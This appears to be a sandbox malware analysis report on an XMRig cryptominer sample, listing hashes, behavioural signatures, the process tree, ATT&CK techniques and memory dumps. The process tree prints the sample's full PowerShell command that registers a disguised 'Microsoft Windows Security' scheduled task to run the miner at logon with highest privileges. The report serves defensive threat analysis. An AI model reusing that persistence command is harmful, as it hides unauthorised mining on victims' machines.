xmrig | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

Analysis

max time kernel
148s
max time network
146s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
30-11-2024 01:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2208413971.exe
Size

10KB
MD5

96509ab828867d81c1693b614b22f41d
SHA1

c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256

a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512

ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca
SSDEEP

96:vdHiIV5H6c10lqo9ZYAoQdVDCcJ+587tG6AuJxGE9btz2qhRC7tCEOhd1Q:vdHiQ5HV1wr9KA/J+izJxTZtzthyOhd

Score

10^/10

xmrig discovery execution miner

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 2268 created 3308	2268	3430811968.exe	52
PID 2268 created 3308	2268	3430811968.exe	52
PID 1140 created 3308	1140	winupsecvmgr.exe	52
PID 1140 created 3308	1140	winupsecvmgr.exe	52
PID 1140 created 3308	1140	winupsecvmgr.exe	52

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral3/memory/1140-40-0x00007FF72AB40000-0x00007FF72B0D7000-memory.dmp	xmrig
behavioral3/memory/3296-43-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-45-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-47-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-49-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-51-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-53-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-55-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-57-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-59-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-61-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-63-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig
behavioral3/memory/3296-65-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
2268	3430811968.exe
1140	winupsecvmgr.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3132	powershell.exe
1792	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1140 set thread context of 432	1140	winupsecvmgr.exe	86
PID 1140 set thread context of 3296	1140	winupsecvmgr.exe	87

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2208413971.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
2268	3430811968.exe
2268	3430811968.exe
3132	powershell.exe
3132	powershell.exe
2268	3430811968.exe
2268	3430811968.exe
1140	winupsecvmgr.exe
1140	winupsecvmgr.exe
1792	powershell.exe
1792	powershell.exe
1140	winupsecvmgr.exe
1140	winupsecvmgr.exe
1140	winupsecvmgr.exe
1140	winupsecvmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe
Token: 36	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe
Token: 36	3132	powershell.exe
Token: SeIncreaseQuotaPrivilege	3132	powershell.exe
Token: SeSecurityPrivilege	3132	powershell.exe
Token: SeTakeOwnershipPrivilege	3132	powershell.exe
Token: SeLoadDriverPrivilege	3132	powershell.exe
Token: SeSystemProfilePrivilege	3132	powershell.exe
Token: SeSystemtimePrivilege	3132	powershell.exe
Token: SeProfSingleProcessPrivilege	3132	powershell.exe
Token: SeIncBasePriorityPrivilege	3132	powershell.exe
Token: SeCreatePagefilePrivilege	3132	powershell.exe
Token: SeBackupPrivilege	3132	powershell.exe
Token: SeRestorePrivilege	3132	powershell.exe
Token: SeShutdownPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeSystemEnvironmentPrivilege	3132	powershell.exe
Token: SeRemoteShutdownPrivilege	3132	powershell.exe
Token: SeUndockPrivilege	3132	powershell.exe
Token: SeManageVolumePrivilege	3132	powershell.exe
Token: 33	3132	powershell.exe
Token: 34	3132	powershell.exe
Token: 35	3132	powershell.exe
Token: 36	3132	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe
3296	dwm.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 2268	2816	2208413971.exe	77
PID 2816 wrote to memory of 2268	2816	2208413971.exe	77
PID 1140 wrote to memory of 432	1140	winupsecvmgr.exe	86
PID 1140 wrote to memory of 3296	1140	winupsecvmgr.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3308
- C:\Users\Admin\AppData\Local\Temp\2208413971.exe
  "C:\Users\Admin\AppData\Local\Temp\2208413971.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2816
- - C:\Users\Admin\AppData\Local\Temp\3430811968.exe
    C:\Users\Admin\AppData\Local\Temp\3430811968.exe
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2268
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3132
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:4792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1792
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:432
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3296

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1140

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
4764ec833397133003e2e24b080cd7ce

SHA1
03c8926d7afc4e605719aee53ef2ce53f6f314cc

SHA256
88331ffd23c1d6cfef379ab5366333f56ee41ff083f0421915302a492cb2a833

SHA512
e9ad86bc3878f4f3e1a38a191864857f24969e0f11d0636cb76523900e97b06d286c120460c38e7f93039356f45900d32ddda990abffb1958af173dfb1aedac1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
eb057c2b14d10a1cb3fba021ed81002d

SHA1
a56f7cd317cc8f881cb2361c0e301deb6fc77c62

SHA256
5c30482a0081ef62fa5f722ab1071df9c8d796730227374a9cdf8d58c795023b

SHA512
de4b9ef72da67ff9eae01abc33d35a231c4e1247bb2ca33e011581ed46a1ac0150c1dd9bcaf4f2f2e957946172e62da41aba2aeef84d3a0a734ea4bd4ca700a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3430811968.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnzybv0q.1rs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/432-44-0x00007FF6BEBB0000-0x00007FF6BEBD9000-memory.dmp

Filesize
164KB

Download
memory/432-42-0x00007FF6BEBB0000-0x00007FF6BEBD9000-memory.dmp

Filesize
164KB

Download
memory/1140-40-0x00007FF72AB40000-0x00007FF72B0D7000-memory.dmp

Filesize
5.6MB

Download
memory/2268-23-0x00007FF62D3D0000-0x00007FF62D967000-memory.dmp

Filesize
5.6MB

Download
memory/3132-17-0x00007FF82ED90000-0x00007FF82F852000-memory.dmp

Filesize
10.8MB

Download
memory/3132-4-0x00007FF82ED93000-0x00007FF82ED95000-memory.dmp

Filesize
8KB

Download
memory/3132-16-0x00007FF82ED90000-0x00007FF82F852000-memory.dmp

Filesize
10.8MB

Download
memory/3132-15-0x00007FF82ED90000-0x00007FF82F852000-memory.dmp

Filesize
10.8MB

Download
memory/3132-20-0x00007FF82ED90000-0x00007FF82F852000-memory.dmp

Filesize
10.8MB

Download
memory/3132-14-0x00007FF82ED90000-0x00007FF82F852000-memory.dmp

Filesize
10.8MB

Download
memory/3132-13-0x000001E3E7D40000-0x000001E3E7D62000-memory.dmp

Filesize
136KB

Download
memory/3296-45-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-43-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-41-0x000001F099BF0000-0x000001F099C10000-memory.dmp

Filesize
128KB

Download
memory/3296-47-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-49-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-51-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-53-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-55-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-57-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-59-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-61-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-63-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download
memory/3296-65-0x00007FF77CBA0000-0x00007FF77D38F000-memory.dmp

Filesize
7.9MB

Download